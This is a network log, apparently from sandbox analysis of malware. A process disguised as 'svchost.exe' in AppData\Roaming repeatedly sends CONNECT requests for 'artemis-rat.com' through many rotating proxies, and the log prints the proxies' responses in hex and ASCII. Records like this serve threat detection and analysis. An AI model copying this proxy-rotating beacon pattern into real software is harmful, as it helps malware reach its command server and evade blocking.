Mar 9, 2024 13:14:31.695882082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2755	192.168.2.5	56178	79.110.196.145	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.696208954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2756	192.168.2.5	58896	203.171.19.98	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.696770906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2757	192.168.2.5	58977	221.153.92.39	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.696919918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2758	192.168.2.5	58970	43.128.146.42	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.697591066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2759	192.168.2.5	59118	162.159.242.10	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.697913885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.859299898 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2760	192.168.2.5	59062	3.90.100.12	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.698266983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.915535927 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:31 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2761	192.168.2.5	59124	104.27.122.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.698920012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.853281975 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2762	192.168.2.5	58908	51.210.223.9	3000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.698920965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2763	192.168.2.5	58872	89.218.8.152	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.699318886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2764	192.168.2.5	59112	104.16.108.149	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.699807882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.854271889 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2765	192.168.2.5	59127	74.48.7.43	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.700109959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2766	192.168.2.5	58948	212.127.93.185	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.705625057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2767	192.168.2.5	58716	117.160.250.130	8899	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.720973015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.146133900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.090934992 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2768	192.168.2.5	59215	103.133.222.170	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.722424030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2769	192.168.2.5	58996	43.131.246.77	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.723516941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2770	192.168.2.5	59217	103.133.222.170	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.724205017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2771	192.168.2.5	59219	103.133.222.170	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.726479053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2772	192.168.2.5	59222	103.133.222.170	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.727608919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2773	192.168.2.5	58931	8.209.255.13	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.730398893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.546283007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.777407885 CET	38	IN	HTTP/1.1 200 OK content-length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2774	192.168.2.5	59110	68.71.254.6	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.730418921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2775	192.168.2.5	58911	102.223.20.217	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.731107950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.116292000 CET	493	IN	HTTP/1.1 302 Found Date: Sat, 09 Mar 2024 12:14:31 GMT Server: Apache/2.4.52 (Ubuntu) Location: https://repository.gij.edu.gh Content-Length: 295 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 70 6f 73 69 74 6f 72 79 2e 67 69 6a 2e 65 64 75 2e 67 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://repository.gij.edu.gh">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2776	192.168.2.5	58976	171.244.140.160	15084	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.733536959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.645947933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.833698034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.146372080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2777	192.168.2.5	59100	52.151.210.204	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.735299110 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2778	192.168.2.5	58963	64.43.89.102	6361	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.735558033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.112376928 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2779	192.168.2.5	56413	37.120.192.154	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.744434118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2780	192.168.2.5	59101	162.223.91.11	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.745634079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2781	192.168.2.5	59126	3.21.101.158	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.749850035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.229177952 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:32 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2782	192.168.2.5	59243	49.51.93.222	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.752810955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2783	192.168.2.5	59246	49.51.93.222	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.754676104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2784	192.168.2.5	59247	49.51.93.222	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.755760908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2785	192.168.2.5	59249	49.51.93.222	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.757334948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2786	192.168.2.5	59042	121.128.194.154	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.759418011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2787	192.168.2.5	59176	104.20.75.31	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.766230106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.921418905 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2788	192.168.2.5	59043	58.234.116.197	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.766606092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2789	192.168.2.5	59178	104.27.37.131	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.770339012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
